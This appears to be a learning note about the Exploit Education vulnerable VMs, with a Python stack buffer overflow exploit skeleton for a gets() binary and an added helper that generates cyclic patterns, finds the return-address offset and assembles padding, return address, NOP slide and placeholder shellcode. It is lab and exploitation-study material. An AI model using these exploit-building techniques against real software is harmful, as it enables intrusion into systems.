Exploit Education

Best way to learn systems

The website is here. It provides vulnerable virtual machine images that can be mounted and booted with QEMU. I found out about this resource through this amazing playlist on binary exploitation by LiveOverflow.

The machines ship with modern mitigations (such as ASLR) disabled by default, so the focus is on the exploitation technique itself rather than on bypassing mitigations. Some of the snippets that helped in cracking the binaries are listed below.

# affects the following pattern:
#     gets(buffer);
#     return 0;
# }
import struct
import sys

# padding to find the input offset for the binary: every 4-byte group is distinct,
# so whichever group lands in the saved return address tells you the offset
padding = b"AAAABBBBCCCCDDDDEEEEFFFF"
# address to return to (stack address of the nopslide, read in gdb at the leave
# instruction at the end of main). ASLR is off, so it is stable across runs.
# Packed as a 64-bit little-endian value: 0x7fffffffdba8 does not fit the 32-bit "I" format.
ret_addr = struct.pack("<Q", 0x7fffffffdba8)
# nopslide: the return address only needs to land somewhere inside it
nopslide = b"\x90" * 100
# shellcode (execve bin/dash) goes here.
# \xCC is the opcode for int3, the breakpoint trap (very useful while cracking the binary inside gdb)
# check references
payload = b"\xCC" * 4

exploit = padding + ret_addr + nopslide + payload
# write raw bytes (not a str representation) so the binary receives the exact payload
sys.stdout.buffer.write(exploit)
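The snippet above finds the offset by hand, by reading which group of the AAAABBBB... padding overwrote the saved return address. The following helper, added here as an example and not taken from the page or from Exploit Education, automates that step: it generates a pattern in which every 4-byte window is unique (a De Bruijn sequence, the same idea pwntools' cyclic uses), recovers the offset from the value that ended up in the return slot, and assembles the padding, return address, nopslide and shellcode in the same layout as the snippet. The function names, the 64-byte buffer size and the "crash" value are all assumptions constructed for the demonstration; the return address and placeholder shellcode are the ones from the snippet.

```python
import struct

# Constructed for this example: uppercase letters keep the pattern readable in gdb.
ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def cyclic_pattern(length, alphabet=ALPHABET, n=4):
    """Return `length` bytes in which every n-byte window is unique.

    Standard FKM De Bruijn construction, cut off once enough bytes exist.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if len(seq) >= length:
            return
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq[:length])


def find_offset(pattern, reg_value, width=4):
    """Offset of the low `width` bytes of reg_value (little-endian) in pattern.

    reg_value is what gdb shows in the return slot after the crash; on x86-64 the
    non-canonical value never reaches rip, so read it from the word rsp points at.
    """
    mask = (1 << (8 * width)) - 1
    needle = (reg_value & mask).to_bytes(width, "little")
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("value not found in pattern; was the pattern long enough?")
    return idx


def build_exploit(offset, ret_addr, shellcode, nop_len=100, word_size=8):
    """Padding up to the saved return address, then ret_addr, nopslide, shellcode.

    ret_addr must point somewhere inside the nopslide; with ASLR disabled it can be
    read once in gdb and reused. word_size selects 32- or 64-bit packing.
    """
    fmt = "<Q" if word_size == 8 else "<I"
    return b"A" * offset + struct.pack(fmt, ret_addr) + b"\x90" * nop_len + shellcode


def demo():
    """Simulated run: a 64-byte buffer followed by 8 bytes of saved rbp (assumed)."""
    pattern = cyclic_pattern(200)
    buffer_size, saved_rbp = 64, 8
    # Constructed crash: the 8 bytes that overwrite the return address.
    crashed_ret = int.from_bytes(pattern[buffer_size + saved_rbp:][:8], "little")
    offset = find_offset(pattern, crashed_ret)
    exploit = build_exploit(offset, 0x7fffffffdba8, b"\xCC" * 4)
    return offset, exploit


if __name__ == "__main__":
    off, ex = demo()
    print("offset:", off)
    print("exploit length:", len(ex))
```

Run the pattern against the binary first (`python3 cyclic.py | ./binary` under gdb), paste the crashing value into `find_offset`, and only then build the real payload; the `width=4` default means the same call works whether gdb reports a 32-bit eip or the 8-byte word at rsp.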

References